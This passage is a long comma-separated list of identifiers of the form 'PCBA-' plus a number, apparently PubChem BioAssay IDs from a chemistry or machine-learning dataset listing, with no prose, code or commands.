-720540,PCBA-720536,PCBA-720535,PCBA-720533,PCBA-720532,PCBA-720528,PCBA-720527,PCBA-720526,PCBA-720525,PCBA-720524,PCBA-720523,PCBA-720522,PCBA-720519,PCBA-651840,PCBA-651839,PCBA-720518,PCBA-720517,PCBA-652280,PCBA-652275,PCBA-651863,PCBA-651829,PCBA-651807,PCBA-720514,PCBA-720513,PCBA-720498,PCBA-651854,PCBA-651845,PCBA-2517,PCBA-651878,PCBA-720507,PCBA-720506,PCBA-652019,PCBA-624373,PCBA-720504,PCBA-720503,PCBA-720502,PCBA-720501,PCBA-720500,PCBA-720499,PCBA-720497,PCBA-720496,PCBA-720495,PCBA-720494,PCBA-720493,PCBA-686947,PCBA-651795,PCBA-651773,PCBA-651772,PCBA-651771,PCBA-651770,PCBA-651591,PCBA-651588,PCBA-651586,PCBA-651585,PCBA-651584,PCBA-624492,PCBA-624490,PCBA-624489,PCBA-624488,PCBA-624440,PCBA-624430,PCBA-624429,PCBA-624428,PCBA-624427,PCBA-624426,PCBA-624364,PCBA-624368,PCBA-624366,PCBA-624363,PCBA-624362,PCBA-720491,PCBA-720490,PCBA-651577,PCBA-624324,PCBA-624316,PCBA-624315,PCBA-687032,PCBA-687031,PCBA-687030,PCBA-687029,PCBA-687028,PCBA-687027,PCBA-624299,PCBA-624290,PCBA-624289,PCBA-686948,PCBA-687022,PCBA-624275,PCBA-624270,PCBA-687020,PCBA-624259,PCBA-687017,PCBA-687013,PCBA-687005,PCBA-687004,PCBA-687003,PCBA-687002,PCBA-687001,PCBA-687000,PCBA-686999,PCBA-686998,PCBA-686997,PCBA-686994,PCBA-686991,PCBA-686985,PCBA-686984,PCBA-686980,PCBA-686979,PCBA-686978,PCBA-651752,PCBA-624376,PCBA-624375,PCBA-624374,PCBA-624372,PCBA-624369,PCBA-624367,PCBA-624365,PCBA-624361,PCBA-624360,PCBA-624359,PCBA-624391,PCBA-624389,PCBA-686971,PCBA-686970,PCBA-686960,PCBA-686959,PCBA-686957,PCBA-652193,PCBA-624205,PCBA-624177,PCBA-624176,PCBA-624175,PCBA-624164,PCBA-624163,PCBA-624174,PCBA-624075,PCBA-624074,PCBA-624073,PCBA-624072,PCBA-686920,PCBA-624107,PCBA-624106,PCBA-624105,PCBA-624104,PCBA-624056,PCBA-624055,PCBA-624049,PCBA-624048,PCBA-624047,PCBA-624046,PCBA-624045,PCBA-624034,PCBA-624027,PCBA-624020,PCBA-624018,PCBA-624016,PCBA-624014,PCBA-624012,PCBA-624011,PCBA-624023,PCBA-624019,PCBA-624006,PCBA-623998,PCBA-623993,PCBA-623991,PCBA-652252,PCBA-624094,PCBA-624093,PCBA-623985,PCBA-623981,PCBA-623969,PCBA-623965,PCBA-652244,PCBA-652242,PCBA-652241,PCBA-623973,PCBA-623972,PCBA-623970,PCBA-623966,PCBA-623951,PCBA-623950,PCBA-623912,PCBA-652208,PCBA-623945,PCBA-623938,PCBA-623904,PCBA-623903,PCBA-623899,PCBA-623897,PCBA-623894,PCBA-623887,PCBA-623885,PCBA-623881,PCBA-652156,PCBA-623883,PCBA-623876,PCBA-623873,PCBA-623864,PCBA-623863,PCBA-623875,PCBA-652145,PCBA-623934,PCBA-623930,PCBA-652135,PCBA-624029,PCBA-624024,PCBA-652128,PCBA-652127,PCBA-652121,PCBA-652116,PCBA-651579,PCBA-651563,PCBA-624474,PCBA-623895,PCBA-623880,PCBA-602414,PCBA-602408,PCBA-652106,PCBA-652105,PCBA-652104,PCBA-602394,PCBA-652102,PCBA-652101,PCBA-602391,PCBA-602373,PCBA-602371,PCBA-602370,PCBA-602366,PCBA-602362,PCBA-623947,PCBA-588775,PCBA-602308,PCBA-602306,PCBA-602285,PCBA-652062,PCBA-652058,PCBA-652057,PCBA-652053,PCBA-652047,PCBA-602269,PCBA-602268,PCBA-652042,PCBA-652041,PCBA-652040,PCBA-602407,PCBA-602316,PCBA-602309,PCBA-488949,PCBA-652025,PCBA-652016,PCBA-652015,PCBA-652023,PCBA-602288,PCBA-602258,PCBA-602256,PCBA-652006,PCBA-652005,PCBA-602317,PCBA-651989,PCBA-602242,PCBA-602190,PCBA-602189,PCBA-602187,PCBA-602186,PCBA-602185,PCBA-602184,PCBA-651971,PCBA-651970,PCBA-651968,PCBA-624162,PCBA-651967,PCBA-540355,PCBA-2769,PCBA-2768,PCBA-2756,PCBA-2755,PCBA-2754,PCBA-1926,PCBA-1919,PCBA-651965,PCBA-651713,PCBA-651712,PCBA-624479,PCBA-624476,PCBA-602227,PCBA-602225,PCBA-602223,PCBA-602222,PCBA-602221,PCBA-602220,PCBA-602219,PCBA-602218,PCBA-602216,PCBA-602214,PCBA-602165,PCBA-602164,PCBA-651956,PCBA-602161,PCBA-602160,PCBA-602158,PCBA-651939,PCBA-651937,PCBA-602129,PCBA-602121,PCBA-602126,PCBA-651848,PCBA-651823,PCBA-651595,PCBA-651593,PCBA-588842,PCBA-651745,PCBA-651675,PCBA-651820,PCBA-588828,PCBA-588826,PCBA-651818,PCBA-651817,PCBA-651815,PCBA-651814,PCBA-651813,PCBA-651812,PCBA-602310,PCBA-651804,PCBA-651802,PCBA-651793,PCBA-651791,PCBA-651789,PCBA-651784,PCBA-651768,PCBA-651778,PCBA-651777,PCBA-588810,PCBA-651758,PCBA-651757,PCBA-651755,PCBA-651754,PCBA-651751,PCBA-651749,PCBA-588771,PCBA-651743,PCBA-651741,PCBA-588776,PCBA-651700,PCBA-588777,PCBA-588754,PCBA-651720,PCBA-588757,PCBA-588756,PCBA-588751,PCBA-588743,PCBA-588741,PCBA-588715,PCBA-588712,PCBA-588711,PCBA-651717,PCBA-651709,PCBA-651705,PCBA-651697,PCBA-588724,PCBA-651693,PCBA-651692,PCBA-651684,PCBA-588673,PCBA-651683,PCBA-651680,PCBA-651673,PCBA-651672,PCBA-588634,PCBA-588632,PCBA-588629,PCBA-651657,PCBA-651635,PCBA-588631,PCBA-588630,PCBA-588628,PCBA-588626,PCBA-588624,PCBA-588553,PCBA-588548,PCBA-651644,PCBA-602404,PCBA-602400,PCBA-588530,PCBA-588529,PCBA-651630,PCBA-602427,PCBA-602356,PCBA-602334,PCBA-588503,PCBA-588495,PCBA-588480,PCBA-602434,PCBA-588717,PCBA-588714,PCBA-588707,PCBA-588696,PCBA-588688,PCBA-588680,PCBA-588679,PCBA-588678,PCBA-588594,PCBA-588570,PCBA-588558,PCBA-588557,PCBA-588556,PCBA-602425,PCBA-602133,PCBA-602131,PCBA-588671,PCBA-588593,PCBA-588588,PCBA-588415,PCBA-651600,PCBA-651599,PCBA-588426,PCBA-588425,PCBA-651597,PCBA-588392,PCBA-588390,PCBA-588404,PCBA-588396,PCBA-588394,PCBA-588388,PCBA-588387,PCBA-588385,PCBA-588384,PCBA-588365,PCBA-588363,PCBA-651570,PCBA-651569,PCBA-651568,PCBA-651567,PCBA-651565,PCBA-651564,PCBA-651561,PCBA-624394,PCBA-602464,PCBA-651559,PCBA-651558,PCBA-588399,PCBA-588374,PCBA-588372,PCBA-588371,PCBA-588331,PCBA-588330,PCBA-588329,PCBA-588324,PCBA-624503,PCBA-624501,PCBA-624493,PCBA-624491,PCBA-540363,PCBA-624487,PCBA-540353,PCBA-540352,PCBA-540350,PCBA-540348,PCBA-540347,PCBA-540339,PCBA-540360,PCBA-540354,PCBA-540338,PCBA-624455,PCBA-588846,PCBA-588845,PCBA-588844,PCBA-588840,PCBA-588321,PCBA-624418,PCBA-624417,PCBA-540318,PCBA-540316,PCBA-540315,PCBA-540314,PCBA-540312,PCBA-624405,PCBA-624404,PCBA-624403,PCBA-624395,PCBA-624385,PCBA-624384,PCBA-624383,PCBA-624382,PCBA-588449,PCBA-540266,PCBA-540264,PCBA-504943,PCBA-504939,PCBA-540323,PCBA-624351,PCBA-624330,PCBA-624343,PCBA-624347,PCBA-624344,PCBA-624337,PCBA-624336,PCBA-624335,PCBA-624322,PCBA-624317,PCBA-624332,PCBA-624331,PCBA-624329,PCBA-624328,PCBA-624327,PCBA-624326,PCBA-540322,PCBA-624312,PCBA-624308,PCBA-602251,PCBA-504837,PCBA-624305,PCBA-588435,PCBA-504831,PCBA-504828,PCBA-504820,PCBA-504818,PCBA-624300,PCBA-624298,PCBA-624297,PCBA-624296,PCBA-624291,PCBA-624287,PCBA-624285,PCBA-624274,PCBA-624273,PCBA-624265,PCBA-624261,PCBA-624258,PCBA-624254,PCBA-624253,PCBA-624252,PCBA-624251,PCBA-624250,PCBA-624249,PCBA-624248,PCBA-624247,PCBA-624246,PCBA-504826,PCBA-504823,PCBA-624245,PCBA-624244,PCBA-624243,PCBA-602338,PCBA-588802,PCBA-588770,PCBA-504569,PCBA-504566,PCBA-1690,PCBA-1689,PCBA-624241,PCBA-624173,PCBA-504937,PCBA-624207,PCBA-504789,PCBA-504788,PCBA-624202,PCBA-624172,PCBA-624171,PCBA-624170,PCBA-624166,PCBA-624161,PCBA-624160,PCBA-504891,PCBA-504769,PCBA-624147,PCBA-624146,PCBA-624145,PCBA-588377,PCBA-588373,PCBA-624134,PCBA-624133,PCBA-624132,PCBA-504755,PCBA-624116,PCBA-624044,PCBA-624032,PCBA-624031,PCBA-624030,PCBA-588647,PCBA-588639,PCBA-588611,PCBA-588609,PCBA-588607,PCBA-588605,PCBA-588575,PCBA-504703,PCBA-504702,PCBA-504687,PCBA-504685,PCBA-2566,PCBA-504674,PCBA-504655,PCBA-624089,PCBA-624087,PCBA-602437,PCBA-602435,PCBA-602433,PCBA-602431,PCBA-504911,PCBA-504910,PCBA-504909,PCBA-504903,PCBA-504901,PCBA-504898,PCBA-504897,PCBA-504667,PCBA-504666,PCBA-602136,PCBA-588857,PCBA-588447,PCBA-588443,PCBA-588437,PCBA-504860,PCBA-504857,PCBA-504854,PCBA-504853,PCBA-504852,PCBA-504654,PCBA-504650,PCBA-504649,PCBA-624002,PCBA-602179,PCBA-504713,PCBA-623996,PCBA-623994,PCBA-623992,PCBA-623989,PCBA-623978,PCBA-623955,PCBA-588572,PCBA-588555,PCBA-623861,PCBA-602469,PCBA-504684,PCBA-504683,PCBA-504682,PCBA-504646,PCBA-504645,PCBA-504597,PCBA-504588,PCBA-602374,PCBA-602372,PCBA-602367,PCBA-504572,PCBA-602478,PCBA-602477,PCBA-602476,PCBA-602475,PCBA-602474,PCBA-504642,PCBA-504640,PCBA-504576,PCBA-504575,PCBA-504574,PCBA-504573,PCBA-504571,PCBA-504570,PCBA-504564,PCBA-504562,PCBA-504561,PCBA-504556,PCBA-504551,PCBA-504535,PCBA-504533,PCBA-504695,PCBA-504694,PCBA-504693,PCBA-504563,PCBA-504560,PCBA-504559,PCBA-504557,PCBA-504555,PCBA-504553,PCBA-504524,PCBA-504504,PCBA-504502,PCBA-504526,PCBA-504518,PCBA-504516,PCBA-504509,PCBA-504508,PCBA-504485,PCBA-602376,PCBA-602304,PCBA-602257,PCBA-602389,PCBA-602388,PCBA-602386,PCBA-602384,PCBA-602382,PCBA-602380,PCBA-602378,PCBA-602377,PCBA-602375,PCBA-602332,PCBA-602369,PCBA-602368,PCBA-602365,PCBA-602364,PCBA-602361,PCBA-504450,PCBA-504449,PCBA-602358,PCBA-602357,PCBA-602350,PCBA-602296,PCBA-588620,PCBA-588608,PCBA-588606,PCBA-588604,PCBA-588563,PCBA-504440,PCBA-602328,PCBA-602326,PCBA-602313,PCBA-602298,PCBA-588401,PCBA-492949,PCBA-602293,PCBA-602292,PCBA-588583,PCBA-588581,PCBA-588568,PCBA-588566,PCBA-588564,PCBA-540371,PCBA-540368,PCBA-540365,PCBA-540349,PCBA-504889,PCBA-504870,PCBA-504868,PCBA-504867,PCBA-504433,PCBA-504432,PCBA-504530,PCBA-504395,PCBA-504394,PCBA-504393,PCBA-504388,PCBA-504409,PCBA-504360,PCBA-504353,PCBA-504347,PCBA-504367,PCBA-504363,PCBA-504358,PCBA-504349,PCBA-504341,PCBA-602208,PCBA-588637,PCBA-504503,PCBA-504484,PCBA-504352,PCBA-504335,PCBA-504633,PCBA-504631,PCBA-504413,PCBA-504331,PCBA-504325,PCBA-504323,PCBA-493250,PCBA-493249,PCBA-602263,PCBA-493239,PCBA-493238,PCBA-493237,PCBA-493235,PCBA-493234,PCBA-493230,PCBA-493228,PCBA-493227,PCBA-493226,PCBA-493225,PCBA-493213,PCBA-602259,PCBA-504608,PCBA-504604,PCBA-504599,PCBA-504931,PCBA-493198,PCBA-493196,PCBA-493195,PCBA-493193,PCBA-493181,PCBA-493180,PCBA-493176,PCBA-588412,PCBA-2576,PCBA-2533,PCBA-493167,PCBA-504390,PCBA-493215,PCBA-493150,PCBA-493149,PCBA-493147,PCBA-493145,PCBA-493142,PCBA-493141,PCBA-493139,PCBA-493137,PCBA-493135,PCBA-493134,PCBA-493133,PCBA-493132,PCBA-493126,PCBA-602236,PCBA-602235,PCBA-602234,PCBA-493130,PCBA-493112,PCBA-602233,PCBA-493095,PCBA-493092,PCBA-602217,PCBA-602215,PCBA-493099,PCBA-493082,PCBA-493081,PCBA-602211,PCBA-602210,PCBA-588780,PCBA-588779,PCBA-602198,PCBA-602188,PCBA-493089,PCBA-493080,PCBA-493069,PCBA-493064,PCBA-493060,PCBA-602204,PCBA-602202,PCBA-602201,PCBA-602200,PCBA-602199,PCBA-493093,PCBA-493053,PCBA-493051,PCBA-493050,PCBA-493037,PCBA-602191,PCBA-602176,PCBA-493015,PCBA-493013,PCBA-602168,PCBA-602167,PCBA-602166,PCBA-449756,PCBA-449750,PCBA-449749,PCBA-434945,PCBA-2631,PCBA-2630,PCBA-2519,PCBA-2398,PCBA-588355,PCBA-540304,PCBA-602127,PCBA-588856,PCBA-493038,PCBA-588855,PCBA-493113,PCBA-588851,PCBA-588849,PCBA-588848,PCBA-588847,PCBA-492954,PCBA-588827,PCBA-588811,PCBA-588505,PCBA-588504,PCBA-540276,PCBA-588809,PCBA-588799,PCBA-588795,PCBA-489039,PCBA-489038,PCBA-489037,PCBA-489036,PCBA-489011,PCBA-588790,PCBA-588783,PCBA-504792,PCBA-588727,PCBA-488985,PCBA-588763,PCBA-504415,PCBA-504359,PCBA-588742,PCBA-588719,PCBA-488976,PCBA-588720,PCBA-488958,PCBA-588689,PCBA-588681,PCBA-588524,PCBA-588359,PCBA-540334,PCBA-492960,PCBA-488913,PCBA-488908,PCBA-488948,PCBA-488934,PCBA-488914,PCBA-488897,PCBA-488891,PCBA-588603,PCBA-588601,PCBA-588600,PCBA-588599,PCBA-588598,PCBA-588591,PCBA-588590,PCBA-588586,PCBA-588579,PCBA-488830,PCBA-488828,PCBA-588554,PCBA-588525,PCBA-588498,PCBA-488858,PCBA-488843,PCBA-488820,PCBA-488803,PCBA-463199,PCBA-435010,PCBA-588547,PCBA-588546,PCBA-588545,PCBA-588544,PCBA-588541,PCBA-588538,PCBA-588537,PCBA-588535,PCBA-588533,PCBA-588532,PCBA-588526,PCBA-488811,PCBA-488810,PCBA-488805,PCBA-488804,PCBA-588516,PCBA-588515,PCBA-588514,PCBA-588513,PCBA-588502,PCBA-588481,PCBA-2423,PCBA-2400,PCBA-2388,PCBA-2387,PCBA-2327,PCBA-504501,PCBA-504497,PCBA-504492,PCBA-504488,PCBA-588463,PCBA-588456,PCBA-540257,PCBA-540254,PCBA-488797,PCBA-488770,PCBA-588453,PCBA-588451,PCBA-588442,PCBA-588440,PCBA-588439,PCBA-588382,PCBA-588379,PCBA-588434,PCBA-588429,PCBA-504673,PCBA-504671,PCBA-504670,PCBA-504665,PCBA-504664,PCBA-504641,PCBA-504517,PCBA-504514,PCBA-504512,PCBA-504489,PCBA-493251,PCBA-488782,PCBA-588411,PCBA-588406,PCBA-588400,PCBA-588398,PCBA-588397,PCBA-588378,PCBA-504927,PCBA-504500,PCBA-588361,PCBA-588349,PCBA-588348,PCBA-588347,PCBA-588345,PCBA-588344,PCBA-588343,PCBA-588342,PCBA-488827,PCBA-488808,PCBA-488795,PCBA-488792,PCBA-588341,PCBA-588340,PCBA-588339,PCBA-504539,PCBA-463185,PCBA-463184,PCBA-504362,PCBA-540327,PCBA-540362,PCBA-463109,PCBA-540359,PCBA-540356,PCBA-540346,PCBA-540343,PCBA-504840,PCBA-540335,PCBA-540326,PCBA-540288,PCBA-540317,PCBA-463080,PCBA-463077,PCBA-463076,PCBA-489004,PCBA-488901,PCBA-504834,PCBA-485352,PCBA-504832,PCBA-540298,PCBA-540297,PCBA-540296,PCBA-540256,PCBA-540280,PCBA-540279,PCBA-540271,PCBA-540270,PCBA-540269,PCBA-540268,PCBA-540259,PCBA-540258,PCBA-540255,PCBA-504659,PCBA-504658,PCBA-540252,PCBA-540246,PCBA-504944,PCBA-504942,PCBA-504941,PCBA-504932,PCBA-449733,PCBA-504895,PCBA-504882,PCBA-435031,PCBA-435029,PCBA-504865,PCBA-504861,PCBA-504850,PCBA-504848,PCBA-504847,PCBA-504845,PCBA-504843,PCBA-504842,PCBA-504841,PCBA-492994,PCBA-492987,PCBA-492996,PCBA-488950,PCBA-488943,PCBA-488932,PCBA-488931,PCBA-488930,PCBA-488909,PCBA-488907,PCBA-488905,PCBA-488870,PCBA-488868,PCBA-488867,PCBA-488866,PCBA-488848,PCBA-488844,PCBA-488836,PCBA-488809,PCBA-488807,PCBA-488802,PCBA-463074,PCBA-504806,PCBA-504724,PCBA-434967,PCBA-434957,PCBA-434935,PCBA-434930,PCBA-434923,PCBA-504765,PCBA-434946,PCBA-504763,PCBA-504762,PCBA-504756,PCBA-463142,PCBA-463081,PCBA-2838,PCBA-2802,PCBA-504730,PCBA-504729,PCBA-504728,PCBA-504727,PCBA-504726,PCBA-504725,PCBA-504723,PCBA-504722,PCBA-504719,PCBA-488935,PCBA-488925,PCBA-488842,PCBA-488826,PCBA-488819,PCBA-463227,PCBA-463105,PCBA-434981,PCBA-485287,PCBA-485285,PCBA-485278,PCBA-485277,PCBA-2822,PCBA-2820,PCBA-504706,PCBA-2812,PCBA-2788,PCBA-2791,PCBA-504701,PCBA-504699,PCBA-504697,PCBA-504689,PCBA-504672,PCBA-504544,PCBA-485295,PCBA-463251,PCBA-463250,PCBA-463107,PCBA-504648,PCBA-488854,PCBA-488851,PCBA-488850,PCBA-488849,PCBA-488838,PCBA-488832,PCBA-488821,PCBA-504549,PCBA-504542,PCBA-493003,PCBA-434951,PCBA-434938,PCBA-2744,PCBA-2742,PCBA-2740,PCBA-504637,PCBA-504636,PCBA-504548,PCBA-504453,PCBA-504447,PCBA-504446,PCBA-2748,PCBA-493002,PCBA-2843,PCBA-2750,PCBA-2739,PCBA-2738,PCBA-504609,PCBA-504565,PCBA-2684,PCBA-2678,PCBA-2649,PCBA-2644,PCBA-504547,PCBA-504546,PCBA-504536,PCBA-493094,PCBA-504467,PCBA-504466,PCBA-504465,PCBA-504444,PCBA-504320,PCBA-504318,PCBA-504316,PCBA-504315,PCBA-504314,PCBA-493247,PCBA-493243,PCBA-493242,PCBA-493233,PCBA-493229,PCBA-489005,PCBA-485288,PCBA-2537,PCBA-2102,PCBA-1903,PCBA-881,PCBA-852,PCBA-728,PCBA-716,PCBA-493197,PCBA-2474,PCBA-504397,PCBA-449748,PCBA-2573,PCBA-2565,PCBA-2564,PCBA-504364,PCBA-504339,PCBA-504333,PCBA-504332,PCBA-504329,PCBA-504327,PCBA-493194,PCBA-504322,PCBA-504313,PCBA-493248,PCBA-493177,PCBA-493240,PCBA-493231,PCBA-493218,PCBA-434941,PCBA-434937,PCBA-493214,PCBA-493212,PCBA-493210,PCBA-493208,PCBA-493206,PCBA-493205,PCBA-493204,PCBA-493203,PCBA-493201,PCBA-493200,PCBA-493199,PCBA-493192,PCBA-493191,PCBA-493188,PCBA-493185,PCBA-493182,PCBA-493179,PCBA-2347,PCBA-493174,PCBA-493170,PCBA-493169,PCBA-493168,PCBA-493166,PCBA-493165,PCBA-493054,PCBA-493052,PCBA-493049,PCBA-493045,PCBA-493100,PCBA-493155,PCBA-493153,PCBA-488837,PCBA-493107,PCBA-493106,PCBA-493102,PCBA-435004,PCBA-493085,PCBA-493083,PCBA-493078,PCBA-493074,PCBA-493073,PCBA-493071,PCBA-493068,PCBA-493067,PCBA-493066,PCBA-493065,PCBA-1666,PCBA-1655,PCBA-1450,PCBA-449726,PCBA-435027,PCBA-488923,PCBA-488921,PCBA-488892,PCBA-488884,PCBA-488882,PCBA-488876,PCBA-488799,PCBA-488793,PCBA-449737,PCBA-449736,PCBA-449727,PCBA-435032,PCBA-435024,PCBA-435018,PCBA-435011,PCBA-2335,PCBA-2500,PCBA-2497,PCBA-2496,PCBA-2483,PCBA-2475,PCBA-2466,PCBA-2397,PCBA-2359,PCBA-2348,PCBA-2337,PCBA-2334,PCBA-2285,PCBA-2284,PCBA-2801,PCBA-2686,PCBA-2682,PCBA-2654,PCBA-2468,PCBA-2442,PCBA-493020,PCBA-493014,PCBA-2799,PCBA-2798,PCBA-1941,PCBA-1535,PCBA-1958,PCBA-1957,PCBA-1750,PCBA-1749,PCBA-1659,PCBA-1618,PCBA-1512,PCBA-485345,PCBA-492998,PCBA-489010,PCBA-434942,PCBA-492961,PCBA-1569,PCBA-489041,PCBA-489026,PCBA-489022,PCBA-492959,PCBA-492952,PCBA-492950,PCBA-489034,PCBA-489020,PCBA-488890,PCBA-492948,PCBA-489033,PCBA-489006,PCBA-488833,PCBA-489040,PCBA-489025,PCBA-489018,PCBA-492947,PCBA-488791,PCBA-489043,PCBA-489014,PCBA-488773,PCBA-489035,PCBA-489032,PCBA-489027,PCBA-2840,PCBA-2839,PCBA-2834,PCBA-2831,PCBA-2640,PCBA-489024,PCBA-489023,PCBA-488920,PCBA-489012,PCBA-488903,PCBA-2238,PCBA-489008,PCBA-489007,PCBA-485353,PCBA-485284,PCBA-1056,PCBA-1701,PCBA-1538,PCBA-2354,PCBA-485367,PCBA-488983,PCBA-488982,PCBA-488981,PCBA-2101,PCBA-488966,PCBA-2784,PCBA-1017,PCBA-488953,PCBA-2197,PCBA-2185,PCBA-488906,PCBA-488904,PCBA-488888,PCBA-488886,PCBA-488880,PCBA-488879,PCBA-488878,PCBA-488875,PCBA-488874,PCBA-488873,PCBA-485368,PCBA-488863,PCBA-488861,PCBA-488860,PCBA-2705,PCBA-1970,PCBA-488840,PCBA-488835,PCBA-463135,PCBA-2561,PCBA-2113,PCBA-488817,PCBA-488816,PCBA-488815,PCBA-488800,PCBA-488783,PCBA-463211,PCBA-434936,PCBA-434931,PCBA-488789,PCBA-488788,PCBA-488785,PCBA-488752,PCBA-488745,PCBA-463120,PCBA-2743,PCBA-2530,PCBA-485364,PCBA-485360,PCBA-485349,PCBA-485341,PCBA-485313,PCBA-463256,PCBA-2597,PCBA-2596,PCBA-2595,PCBA-2592,PCBA-2590,PCBA-2588,PCBA-2401,PCBA-2704,PCBA-2693,PCBA-2683,PCBA-2635,PCBA-2633,PCBA-2610,PCBA-2525,PCBA-2518,PCBA-2511,PCBA-2396,PCBA-485314,PCBA-485298,PCBA-485297,PCBA-485294,PCBA-485290,PCBA-2662,PCBA-2480,PCBA-2453,PCBA-2446,PCBA-485281,PCBA-463217,PCBA-2568,PCBA-2567,PCBA-2515,PCBA-2514,PCBA-463254,PCBA-2634,PCBA-2547,PCBA-2499,PCBA-2581,PCBA-463229,PCBA-463220,PCBA-463214,PCBA-463206,PCBA-463205,PCBA-463204,PCBA-463203,PCBA-463191,PCBA-2346,PCBA-2332,PCBA-2463,PCBA-2460,PCBA-463127,PCBA-449761,PCBA-449755,PCBA-463106,PCBA-435009,PCBA-435002,PCBA-2819,PCBA-2808,PCBA-2752,PCBA-2664,PCBA-2532,PCBA-463097,PCBA-463096,PCBA-2753,PCBA-463088,PCBA-449766,PCBA-434955,PCBA-435026,PCBA-434968,PCBA-1335,PCBA-449762,PCBA-1769,PCBA-1341,PCBA-1340,PCBA-1339,PCBA-1337,PCBA-1336,PCBA-1334,PCBA-449764,PCBA-449745,PCBA-1333,PCBA-435023,PCBA-2823,PCBA-449754,PCBA-449753,PCBA-1405,PCBA-959,PCBA-958,PCBA-945,PCBA-944,PCBA-942,PCBA-923,PCBA-912,PCBA-907,PCBA-900,PCBA-897,PCBA-896,PCBA-892,PCBA-890,PCBA-889,PCBA-875,PCBA-1519,PCBA-1379,PCBA-995,PCBA-994,PCBA-993,PCBA-989,PCBA-988,PCBA-987,PCBA-986,PCBA-985,PCBA-984,PCBA-983,PCBA-982,PCBA-981,PCBA-980,PCBA-979,PCBA-978,PCBA-977,PCBA-976,PCBA-975,PCBA-974,PCBA-973,PCBA-972,PCBA-971,PCBA-970,PCBA-969,PCBA-968,PCBA-967,PCBA-966,PCBA-965,PCBA-964,PCBA-963,PCBA-962,PCBA-961,PCBA-960,PCBA-955,PCBA-948,PCBA-947,PCBA-946,PCBA-943,PCBA-939,PCBA-938,PCBA-934,PCBA-933,PCBA-931,PCBA-930,PCBA-926,PCBA-925,PCBA-924,PCBA-922,PCBA-921,PCBA-918,PCBA-917,PCBA-916,PCBA-915,PCBA-914,PCBA-910,PCBA-904,PCBA-903,PCBA-902,PCBA-899,PCBA-895,PCBA-891,PCBA-887,PCBA-885,PCBA-884,PCBA-883,PCBA-1026,PCBA-1023,PCBA-434932,PCBA-1376,PCBA-1047,PCBA-1045,PCBA-1028,PCBA-1015,PCBA-856,PCBA-854,PCBA-851,PCBA-435019,PCBA-434958,PCBA-1744,PCBA-435014,PCBA-2326,PCBA-434997,PCBA-434987,PCBA-2311,PCBA-2307,PCBA-2298,PCBA-2296,PCBA-2295,PCBA-2217,PCBA-434976,PCBA-434954,PCBA-434947,PCBA-2603,PCBA-2758,PCBA-2821,PCBA-2538,PCBA-2795,PCBA-2794,PCBA-2787,PCBA-2786,PCBA-2785,PCBA-2451,PCBA-2167,PCBA-2763,PCBA-2762,PCBA-2745,PCBA-2741,PCBA-2734,PCBA-2733,PCBA-2730,PCBA-2729,PCBA-2695,PCBA-2115,PCBA-2111,PCBA-2110,PCBA-2100,PCBA-2712,PCBA-2711,PCBA-2708,PCBA-2701,PCBA-2696,PCBA-2685,PCBA-2680,PCBA-2677,PCBA-2676,PCBA-2486,PCBA-2673,PCBA-2671,PCBA-2669,PCBA-2668,PCBA-2667,PCBA-2666,PCBA-2660,PCBA-2425,PCBA-2381,PCBA-1491,PCBA-1489,PCBA-2613,PCBA-2458,PCBA-2457,PCBA-2456,PCBA-2452,PCBA-2510,PCBA-2594,PCBA-2591,PCBA-2585,PCBA-2572,PCBA-1721,PCBA-2559,PCBA-2551,PCBA-2549,PCBA-2528,PCBA-1030,PCBA-2546,PCBA-2508,PCBA-2507,PCBA-2364,PCBA-2353,PCBA-2173,PCBA-1708,PCBA-1707,PCBA-2501,PCBA-2035,PCBA-2015,PCBA-2454,PCBA-2450,PCBA-2467,PCBA-411,PCBA-2441,PCBA-2422,PCBA-2403,PCBA-2395,PCBA-2195,PCBA-1540,PCBA-2419,PCBA-2414,PCBA-2409,PCBA-2402,PCBA-2244,PCBA-1650,PCBA-1621,PCBA-2429,PCBA-2410,PCBA-1916,PCBA-2391,PCBA-2390,PCBA-1981,PCBA-1863,PCBA-2384,PCBA-2382,PCBA-1985,PCBA-1850,PCBA-2294,PCBA-2323,PCBA-2289,PCBA-1751,PCBA-2286,PCBA-2279,PCBA-1543,PCBA-1541,PCBA-2267,PCBA-2265,PCBA-2263,PCBA-2257,PCBA-1455,PCBA-2253,PCBA-2252,PCBA-2251,PCBA-2242,PCBA-1466,PCBA-2224,PCBA-2213,PCBA-2212,PCBA-2210,PCBA-2208,PCBA-2003,PCBA-2002,PCBA-1999,PCBA-1994,PCBA-1990,PCBA-1988,PCBA-2180,PCBA-2179,PCBA-2160,PCBA-2147,PCBA-2120,PCBA-2112,PCBA-2107,PCBA-2096,PCBA-2010,PCBA-2089,PCBA-2081,PCBA-2080,PCBA-2077,PCBA-2075,PCBA-2051,PCBA-2044,PCBA-2037,PCBA-2027,PCBA-2020,PCBA-2019,PCBA-1868,PCBA-2009,PCBA-1983,PCBA-1975,PCBA-1973,PCBA-1972,PCBA-1969,PCBA-1626,PCBA-1964,PCBA-1960,PCBA-1959,PCBA-1956,PCBA-1872,PCBA-1948,PCBA-1891,PCBA-1944,PCBA-1936,PCBA-1935,PCBA-1934,PCBA-1933,PCBA-1915,PCBA-1914,PCBA-1913,PCBA-1902,PCBA-1900,PCBA-1897,PCBA-1896,PCBA-1895,PCBA-1890,PCBA-1889,PCBA-1888,PCBA-1886,PCBA-1884,PCBA-1883,PCBA-1882,PCBA-1877,PCBA-1876,PCBA-1871,PCBA-1869,PCBA-1865,PCBA-1733,PCBA-1634,PCBA-1631,PCBA-1821,PCBA-1816,PCBA-1815,PCBA-1493,PCBA-1492,PCBA-1461,PCBA-1795,PCBA-1771,PCBA-1770,PCBA-1753,PCBA-1740,PCBA-1739,PCBA-1736,PCBA-1735,PCBA-1731,PCBA-1730,PCBA-1727,PCBA-1725,PCBA-1724,PCBA-1723,PCBA-1705,PCBA-1699,PCBA-1692,PCBA-1691,PCBA-1688,PCBA-1687,PCBA-1686,PCBA-1682,PCBA-1660,PCBA-1641,PCBA-1619,PCBA-1627,PCBA-1253,PCBA-1573,PCBA-1572,PCBA-1571,PCBA-1570,PCBA-1568,PCBA-1567,PCBA-1471,PCBA-1562,PCBA-1559,PCBA-1558,PCBA-1534,PCBA-1518,PCBA-1516,PCBA-1487,PCBA-1479,PCBA-1469,PCBA-1468,PCBA-1465,PCBA-1460,PCBA-1463,PCBA-1458,PCBA-1457,PCBA-1394,PCBA-1454,PCBA-1452,PCBA-1445,PCBA-1444,PCBA-1431,PCBA-1437,PCBA-1435,PCBA-1442,PCBA-1259,PCBA-846,PCBA-1215,PCBA-1421,PCBA-1420,PCBA-1419,PCBA-1418,PCBA-1417,PCBA-1414,PCBA-1412,PCBA-